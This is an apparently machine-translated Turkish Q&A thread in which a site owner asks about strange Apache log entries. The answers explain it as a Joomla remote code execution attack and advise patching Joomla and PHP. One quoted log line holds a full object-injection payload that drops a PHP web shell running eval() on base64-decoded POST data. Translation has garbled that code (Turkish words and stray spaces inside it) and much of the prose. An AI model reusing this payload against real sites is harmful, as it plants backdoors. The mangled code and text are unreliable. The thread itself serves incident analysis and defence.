Bazı betik saldırı teknikleri için kullanıcı aracısı kimliği kullanıldı mı?

Sitemdeki Apache erişim günlüğü girişleri genellikle şuna benzer:

207.46.13.174 - - [31 / Ekim / 2016: 10: 18: 55 +0100] "GET / iletişim HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (uyumlu; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 ÖZLÜK 10.10.36.125:104 0.607

böylece burada kullanıcı-aracı alanını görebilirsiniz. Ama bugün ayrıca şu şekilde kullanılan kullanıcı aracısı alanını buldum:

62.210.162.42 - - [31 / Ekim / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 "fc", O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers" a: 1: {i: 0 a: 2: {i: 0; a: 9: "SimplePie": 5: {s: 8: "sterilize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "FEED_URL"; s: 242: "file_put_contents ($ _server [" DOCUMENT_ROOT" ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; eğer (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST [ 'z0']); @ Eval (\ "\\\ x24safedg = \ x24xsser; \");} "); jFactory :: getConfig (); exit;" s: 19:" cache_name_function "; s: 6:" assert "; s: 5:" önbellek "b 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304

Bu bir saldırı mıydı? Bir sonraki günlük girdisinin sqlconfigbak.phpkomut dosyasında belirtilen başarılı bir şekilde alındığı (kod 200) dosyası olduğu görülüyor . Her ne kadar dosyayı dosya sisteminde bulamıyorum:

62.210.162.42 - - [31 / Ekim / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (uyumlu; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

Lütfen burada neler oluyordu?

Bu Joomla 0 Günlük Saldırı. Burada bulunan bilgiler: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

Bu, __test'e rağmen bir güvenlik açığı testi değildir. Bu bir saldırı.

Herhangi bir Joomla kurulumunun mümkün olduğunca güncel olduğundan emin olun.

Başka bir seçenek de, ortak bir dize arayarak bu açıktan kurtulmak için .htaccess kullanmaktır, "__test" işe yarar ve başka bir yere yönlendirir.

Bağladığınız IP adresi bir Google ana bilgisayar adına çözümlenmediği için Google değildir. Kişi veya bot sitenizi güvenlik açıklarına karşı tarıyor. Birincisi bir Joomla güvenlik açığı bulmaya çalışıyor.

Bu etkinlikler, çoğu web sitesinde düzenli bir durumdur, en iyi uygulamaları izlediğinizden ve web sitenizi sertleştirdiğinizden, işlemin uzun sürdüğünden ve çevrimiçi bir öğretici bulup izlemeniz gerekir.

Diğer cevaplara ek olarak, bu saldırının işe yaradığı gerçeğinin PHP'nin eski, güvensiz bir sürümünü çalıştırdığınızı gösterdiğini unutmayın. Bu saldırının istismar ettiği hatayı gidermek için Eylül 2015'te yayınlandı. Güncelleme işleminizi çalıştırın ve PHP'nin en son sürümünde çekildiğinden emin olun. Ve sunucunuz en az bir yıldır güncel tutulmamış gibi göründüğü için İnternet'e bakan diğer eski programları da kontrol edin.